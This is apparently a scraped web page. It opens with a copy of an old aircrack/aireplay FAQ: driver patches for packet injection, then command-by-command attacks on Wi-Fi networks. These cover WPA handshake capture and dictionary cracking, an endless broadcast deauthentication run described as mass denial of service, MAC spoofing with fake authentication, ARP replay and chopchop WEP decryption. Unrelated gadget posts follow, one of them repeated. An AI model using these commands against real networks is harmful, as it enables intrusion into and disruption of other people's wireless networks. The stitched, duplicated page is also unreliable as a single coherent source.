WZCOOK will display the PMK (Pairwise Master Key), a 256-bit value which is the result of the passphrase hashed 8192 times together with the ESSID and the ESSID length. The passphrase itself can't be recovered -- however, knowing the PMK is enough to connect to a WPA-protected wireless network with wpa_supplicant (see the Windows README). Your wpa_supplicant.conf configuration file should look like:

network={
ssid="my_essid"
pmk=5c9597f3c8245907ea71a89d[...]9d39d08e
}

How do I patch the driver for injection with aireplay ?

As of now, aireplay only supports injection on Prism2, PrismGT (FullMAC), Atheros, RTL8180 and Ralink. Injection on Centrino, Hermes, ACX1xx, Aironet, ZyDAS, Marvell and Broadcom is not supported because of firmware and/or driver limitations.

Injection on Prism2 and Atheros is still pretty much experimental; if your card appears to hang (no packets captured or injected), disable the interface, reload the drivers and re-insert the card. Also consider updating the firmware (if Prism2).

All drivers must be patched so as to support injection in Monitor mode. You will need linux headers that match your current running kernel; if not, you will have to download the linux source and compile a custom kernel.

If you have trouble patching and compiling stuff, you may want to use the Troppix LiveCD, which includes patched device drivers.

• Installing the madwifi driver (Atheros cards)

  Note 1: you'll need uudecode from the sharutils package.

  Note 2: the 20051025 patch should also work with newer version of the madwifi CVS.

  Note 3: if you use wpa_supplicant, you should recompile it (older versions are not compatible with the current madwifi CVS), and make sure CONFIG_DRIVER_MADWIFI=y is uncommented in config.h.

  Note 4: with the current madwifi, it is no longer needed to run "iwpriv ath0 mode 2", since the driver allows injection in mode 0 using the new athXraw interface.

  Allowed modes	Physical medium
  Mode 0	Automatic (a/b/g)
  Mode 1	802.11a only
  Mode 2	802.11b only
  Mode 3	802.11g only

  ifconfig ath0 down
  rmmod wlan_wep ath_rate_sample ath_rate_onoe \
       ath_pci wlan ath_hal 2>/dev/null
  
  find /lib/modules -name 'ath*'  -exec rm -v {} \; 2>/dev/null
  find /lib/modules -name 'wlan*' -exec rm -v {} \; 2>/dev/null
  cd /usr/src
  wget http://100h.org/wlan/linux/atheros/madwifi-cvs-20051025.tgz
  wget http://100h.org/wlan/linux/patches/madwifi-cvs-20051025.patch
  tar -xvzf madwifi-cvs-20051025.tgz
  cd madwifi-cvs-20051025
  patch -Np1 -i ../madwifi-cvs-20051025.patch
  make KERNELPATH=/usr/src/linux-
  make install
  modprobe ath_pci

  It is now possible to set the transmit rate with madwifi (and also rt2570). The recommended rate is 5.5 Mbps, but you can lower it or raise it, depending on your distance from the AP. For example:

  iwconfig ath0 rate 24M

  Modulation	Allowed rates
  DSSS / CCK	1M, 2M, 5.5M, 11M
  OFDM (a/g)	6M, 9M, 12M, 24M, 36M, 48M, 54M

  When using attacks 2, 3 and 4, changing the number of packets per second sent by aireplay (option -x) sometimes helps getting better results; the default is 500 pps.

• Installing the prism54 driver (PrismGT FullMAC cards)

  ifconfig eth1 down
  rmmod prism54
  
  cd /usr/src
  wget http://100h.org/wlan/linux/prismgt/prism54-svn-20050724.tgz
  wget http://100h.org/wlan/linux/patches/prism54-svn-20050724.patch
  tar -xvzf prism54-svn-20050724.tgz
  cd prism54-svn-20050724
  patch -Np1 -i ../prism54-svn-20050724.patch
  make modules && make install
  wget http://100h.org/wlan/linux/prismgt/1.0.4.3.arm
  mkdir -p /usr/lib/hotplug/firmware
  mkdir -p /lib/firmware
  cp 1.0.4.3.arm /usr/lib/hotplug/firmware/isl3890
  mv 1.0.4.3.arm /lib/firmware/isl3890
  depmod -a

• Installing the HostAP driver (Prism2 cards)

  ifconfig wlan0 down
  wlanctl-ng wlan0 lnxreq_ifstate ifstate=disable
  /etc/init.d/CardBus stop
  rmmod prism2_pci
  rmmod hostap_pci
  
  cd /usr/src
  wget http://100h.org/wlan/linux/prism2/hostap-driver-0.4.5.tar.gz
  wget http://100h.org/wlan/linux/patches/hostap-driver-0.3.9.patch
  tar -xvzf hostap-driver-0.4.5.tar.gz
  cd hostap-driver-0.4.5
  patch -Np1 -i ../hostap-driver-0.3.9.patch
  make && make install
  mv -f /etc/pcmcia/wlan-ng.conf /etc/pcmcia/wlan-ng.conf~
  /etc/init.d/pcmcia start
  modprobe hostap_pci &>/dev/null

• Installing the wlan-ng driver (Prism2 cards)

  Important note: when the card is inserted, wlan-ng will flash the firmware in RAM (volatile download) with versions PRI 1.1.4 and STA 1.8.3. Many users experienced problems with this operation, so in any case it's safer to just use hostap instead. Furthermore, HostAP works more reliably and supports iwconfig whereas wlan-ng doesn't.

  ifconfig wlan0 down
  wlanctl-ng wlan0 lnxreq_ifstate ifstate=disable
  /etc/init.d/pcmcia stop
  rmmod prism2_pci
  rmmod hostap_pci
  find /lib/modules \( -name p80211* -o -name prism2* \) \
     -exec rm -v {} \;
  
  cd /usr/src
  wget http://100h.org/wlan/linux/prism2/wlanng-0.2.1-pre26.tar.gz
  wget http://100h.org/wlan/linux/patches/wlanng-0.2.1-pre26.patch
  tar -xvzf wlanng-0.2.1-pre26.tar.gz
  cd wlanng-0.2.1-pre26
  patch -Np1 -i ../wlanng-0.2.1-pre26.patch
  make config && make all && make install
  mv /etc/pcmcia/hostap_cs.conf /etc/pcmcia/hostap_cs.conf~
  /etc/init.d/pcmcia start
  modprobe prism2_pci &>/dev/null

• Installing the r8180-sa2400 driver (RTL8180 cards)

  ifconfig wlan0 down
  rmmod r8180
  
  cd /usr/src
  wget http://100h.org/wlan/linux/rtl8180/rtl8180-0.21.tar.gz
  wget http://100h.org/wlan/linux/patches/rtl8180-0.21.patch
  tar -xvzf rtl8180-0.21.tar.gz
  cd rtl8180-0.21
  patch -Np1 -i ../rtl8180-0.21.patch
  make && make install
  depmod -a
  modprobe r8180

• Installing the rt2500 driver (Ralink b/g PCI/CardBus)

  ifconfig ra0 down
  rmmod rt2500
  
  cd /usr/src
  wget http://100h.org/wlan/linux/ralink/rt2500-cvs-20051112.tgz
  tar -xvzf rt2500-cvs-20051112.tgz
  cd rt2500-cvs-20051112
  cd Module
  make && make install
  modprobe rt2500

  Make sure to load the driver with modprobe (not insmod) and to put the card in Monitor mode before bringing the interface up.

• Installing the rt2570 driver (Ralink b/g USB)

  ifconfig rausb0 down
  rmmod rt2570
  
  cd /usr/src
  wget http://100h.org/wlan/linux/ralink/rt2570-cvs-20051112.tgz
  tar -xvzf rt2570-cvs-20051112.tgz
  cd rt2570-cvs-20051112
  cd Module
  make && make install
  modprobe rt2570

The driver won't compile.

This usually happens because the linux headers don't match your current running kernel. In this situation, just recompile a fresh kernel, install it and reboot. Then, try again compiling the driver.

See this HOWTO for more details about kernel compilation.

How do I use aireplay ?

If the driver was properly patched, aireplay is able to inject raw 802.11 packets in Monitor mode; it currently implements a set of five different attacks.

If you get "ioctl(SIOCGIFINDEX) failed: No such device", double check that your device name is correct and that you haven't forgotten a parameter on the command line.

In the following examples, 00:13:10:30:24:9C is the MAC address of the access point (on channel 6), and 00:09:5B:EB:C5:2B is the MAC address of a wireless client.

• Attack 0: deauthentication

  This attack is mostly useful to recover a hidden (not broadcasted) ESSID and for capturing WPA handshakes by forcing clients to reauthenticate. It can also be used to generate ARP requests as Windows clients sometimes flush their ARP cache when disconnected. Of course, this attack is totally useless if there are no associated wireless clients.

  It is usually more effective to target a specific station using the -c parameter.

  Some examples:

  • WPA Handshake capture with an Atheros

    airmon.sh start ath0
    airodump ath0 out 6  (switch to another console)
    aireplay -0 5 -a 00:13:10:30:24:9C -c 00:09:5B:EB:C5:2B ath0
    (wait for a few seconds)
    aircrack -w /path/to/dictionary out.cap

  • ARP request generation with a Prism2 card

    airmon.sh start wlan0
    airodump wlan0 out 6  (switch to another console)
    aireplay -0 10 -a 00:13:10:30:24:9C wlan0
    aireplay -3 -b 00:13:10:30:24:9C -h 00:09:5B:EB:C5:2B wlan0
    

    After sending the five batches of deauthentication packets, we start listening for ARP requests with attack 3. The -h option is mandatory and has to be the MAC address of an associated client.

    If the driver is wlan-ng, you must run the airmon.sh script; otherwise the card won't be correctly setup for injection.

  • Mass denial-of-service with a RT2500 card

    airmon.sh start ra0
    aireplay -0 0 -a 00:13:10:30:24:9C ra0

    With parameter 0, this attack will loop forever sending deauthentication packets to the broadcast address, thus preventing clients from staying connected.

• Attack 1: fake authentication

  This attack is only useful when you need an associated MAC address in attacks 2, 3, 4 (-h option) and there is currently no associated client. However it is genereally better to use the MAC address of a real client (like here, 00:09:5B:EB:C5:2B) in attacks 2, 3 and 4. The fake auth attack does NOT generate ARP requests.

  Also, subsequent attacks will likely perform better if you update the MAC address of the card, so that it properly sends ACKs:

  ifconfig ath0 down
  ifconfig ath0 hw ether 00:11:22:33:44:55
  ifconfig ath0 up
  
  aireplay -1 0 -e 'the ssid' -a 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0
  12:14:06  Sending Authentication Request
  12:14:06  Authentication successful
  12:14:06  Sending Association Request
  12:14:07  Association successful :-)

  With patched madwifi CVS 2005-08-14, it's possible to inject packets while in Managed mode (the WEP key itself doesn't matter, as long as the AP accepts Open-System authentication). So, instead of running attack 1, you may just associate and inject / monitor through the athXraw interface: ifconfig ath0 down hw ether 00:11:22:33:44:55 iwconfig ath0 mode Managed essid 'the ssid' key AAAAAAAAAA ifconfig ath0 up sysctl -w dev.ath0.rawdev=1 ifconfig ath0raw up airodump ath0raw out 6 Then you can run attack 3 or 4 (aireplay will automatically replace ath0 with ath0raw below): aireplay -3 -h 00:11:22:33:44:55 -b 00:13:10:30:24:9C ath0 aireplay -4 -h 00:10:20:30:40:50 -f 1 ath0

  Some access points require to reassociate every 30 seconds, otherwise our fake client is considered disconnected. In this case, setup the periodic re-association delay:

  aireplay -1 30 -e 'the ssid' -a 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0

  If this attacks seems to fail (aireplay keeps sending authentication requests), MAC address filtering may be in place. Also make sure that:

  • You are close enough to the access point.
  • The driver is properly patched and installed.
  • The card is configured on the same channel as the AP.
  • The BSSID and ESSID (-a / -e options) are correct.
  • If Prism2, make sure the firmware was updated.

  As a reminder: you can't inject with a Centrino, Hermes, ACX1xx, Aironet, ZyDAS, Marvell or Broadcom chipset because of firmware and/or driver limitations.

• Attack 2: interactive packet replay

  This attack allows you to choose a given packet for replaying; it sometimes gives more effective results than attack 3 (automatic ARP reinjection).

  You could use it, for example, to attempt the "any data re-broadcast" attack, which only works if the AP actually reencrypts WEP data packets:

  aireplay -2 -b 00:13:10:30:24:9C -n 100 -p 0841 \
     -h 00:09:5B:EB:C5:2B -c FF:FF:FF:FF:FF:FF ath0

  You can also use attack 2 to manually replay WEP-encrypted ARP request packets, which size is either 68 or 86 bytes (depending on the operating system):

  aireplay -2 -b 00:13:10:30:24:9C -d FF:FF:FF:FF:FF:FF \
     -m 68 -n 68 -p 0841 -h 00:09:5B:EB:C5:2B ath0
  
  aireplay -2 -b 00:13:10:30:24:9C -d FF:FF:FF:FF:FF:FF \
     -m 86 -n 86 -p 0841 -h 00:09:5B:EB:C5:2B ath0

• Attack 3: ARP-request reinjection

  The classic ARP-request replay attack is the most effective to generate new IVs, and works very reliably. You need either the MAC address of an associated client (00:09:5B:EB:C5:2B), of a fake MAC from attack 1 (00:11:22:33:44:55). You may have to wait for a couple of minutes, or even longer, until an ARP request shows up; this attack will fail if there is no traffic.

  Please note that you can also reuse ARP requests from a previous capture using the -r switch.

  aireplay -3 -b 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0
  Saving ARP requests in replay_arp-0627-121526.cap
  You must also start airodump to capture replies.
  Read 2493 packets (got 1 ARP requests), sent 1305 packets...

• Attack 4: KoreK's "chopchop" (CRC prediction)

  This attack, when successful, can decrypt a WEP data packet without knowing the key. It can even work against dynamic WEP. This attack does not recover the WEP key itself, but merely reveals the plaintext. However, most access points are not vulnerable at all. Some may seem vulnerable at first but actually drop data packets shorter that 60 bytes. This attack requires at least one WEP data packet.

  1. First, we decrypt one packet :

     aireplay -4 -h 00:09:5B:EB:C5:2B ath0

  2. Let's have a look at the IP address :

     tcpdump -s 0 -n -e -r replay_dec-0627-022301.cap
     reading from file replay_dec-0627-022301.cap, link-type [...]
     IP 192.168.1.2 > 192.168.1.255: icmp 64: echo request seq 1

  3. Then, forge an ARP request.

     The source IP (192.168.1.100) doesn't matter, but the destination IP (192.168.1.2) must respond to ARP requests. The source MAC must belong to an associated station.

     ./arpforge replay_dec-0627-022301.xor 1 00:13:10:30:24:9C \
     00:09:5B:EB:C5:2B 192.168.1.100 192.168.1.2 arp.cap

  4. And replay our forged ARP request :

     aireplay -2 -r arp.cap ath0

Read more

0 Amkette FlashLink Review

Amkette FlashLink
What do you do when you have to transfer chunks of datafrom your desktop to your laptop/netook or from yourlaptop to a netbook? Wi-Fi sharing would do, but what if you donot have Internet on both the devices -LAN or probably Blue-tooth, but that is so slow that you just might decide not to goahead. You can use Amkette, FlashLink, which device looks likea pen drive with a micro USB slot on one end.Once Flash Link isconnected to one of the devices, the inbuilt software, asks you torun the AFLloader in both the devices that are connected usinga USB cable. And this hap-pens everytime the devicesare connected. And oncethat is done, the AmketteFlashLink suite opens up with 5 options;Go! Finder, Go! Bridge, Remote Share, Folder Syncand Outlook Sync.
Go Finder is basically the name for the storage partof the device, that is 192MB. Go! Bridge allows the devices to ac-cess each other's hard drives and copy content from each otheror delete documents from each other. One can view pictures, videosand play music directly from the connected device as well. While Itried to view some videos and hear some songs from the other de-vice, there was no stutter both in terms of music or video, which ispretty good. I loved folder sync and like the fact that I would nothave to use the hard drive twice and use twice the time to transfercontent from my desktop to my notebook and vice-versa.
Bottomline: FlashLink from Amkette is a very good de-vice that makes syncing and content transfer easy.Also, the price makes it a sensible buy too.

Read more

0 ASUS TO LAUNCH ALMOST SIX TABLETS IN THE COMING MONTHS

Asus has been working on multiple tablet devices for a while and now Digitimes report that as many as 6 tablets are in the pipeline. The site says that it obtained the information from Asus President Jerry Shen. That said, these are still rumors and Digitimes has a history of presenting rumors as fact.

So here is what we know at the moment, assuming that Digitimes has got its sources correct. The upcoming Asus tablets will have screen sizes ranging from 7 to 12 inches. First of the six machines will hit the streets in December. The remaining five will make their debut by March.

Some of these tablets will have ARM-based processors and run Google Android or Windows Embedded 7. Others will have x86 based processors and run Windows.
There will be two 7 inch models. One of them will have WiFi and the other will have 3G and phone capabilities. Both of these machines are likely to have ARM-based processors.

There will be two models in the 9 inch space. One of them will have a NVIDIA Tegra 2 processor and run Google Android. The other model will have an Intel x86 processor and run Windows. There is no word on final pricing, but the Tegra based tablet is expected to be around $100 cheaper than the Windows tablet.

Aside from the 7 and 9 inch models, Asus is also developing 10 and 12 inch tablets.

Read more

0 ASUS TO LAUNCH ALMOST SIX TABLETS IN THE COMING MONTHS

Asus has been working on multiple tablet devices for a while and now Digitimes report that as many as 6 tablets are in the pipeline. The site says that it obtained the information from Asus President Jerry Shen. That said, these are still rumors and Digitimes has a history of presenting rumors as fact.

So here is what we know at the moment, assuming that Digitimes has got its sources correct. The upcoming Asus tablets will have screen sizes ranging from 7 to 12 inches. First of the six machines will hit the streets in December. The remaining five will make their debut by March.

Some of these tablets will have ARM-based processors and run Google Android or Windows Embedded 7. Others will have x86 based processors and run Windows.
There will be two 7 inch models. One of them will have WiFi and the other will have 3G and phone capabilities. Both of these machines are likely to have ARM-based processors.

There will be two models in the 9 inch space. One of them will have a NVIDIA Tegra 2 processor and run Google Android. The other model will have an Intel x86 processor and run Windows. There is no word on final pricing, but the Tegra based tablet is expected to be around $100 cheaper than the Windows tablet.

Aside from the 7 and 9 inch models, Asus is also developing 10 and 12 inch tablets.

Read more

0 ASUS N53SV-A1 MULTIMEDIA NOTEBOOK

The 15.6 inch Asus N53SV-A1 multimedia notebook has started shipping in the US. The N53SV-A1 is the first notebook in the Asus N series to sport Intel's 2nd generation Core 'Sandy Bridge' processors.

Precisely, the notebook has an Intel Core i7-2630QM qaud-core processor, GeForce GT 540M 1GB discrete graphics, 4GB of RAM, a 750GB hard drive, DVD burner and a silver aluminum finish. The 15.6 inch display has a resolution of 1366 x 768 pixels.

The N53SV-A1 runs Windows 7 Home Premium operating system. It also has a 2 megapixel webcam, microphone, Altec Lansing stereo speakers, 1 USB 3.0 port, 2 USB 2.0 ports, 1 eSATA port, HDMI, VGA and a 5-in-1 media card reader. The laptop weighs 6.4 pounds with the standard 6-cell battery.

The Asus N53SV-A1 can be purchased from SuperBiiz for $1,170.96.

Read more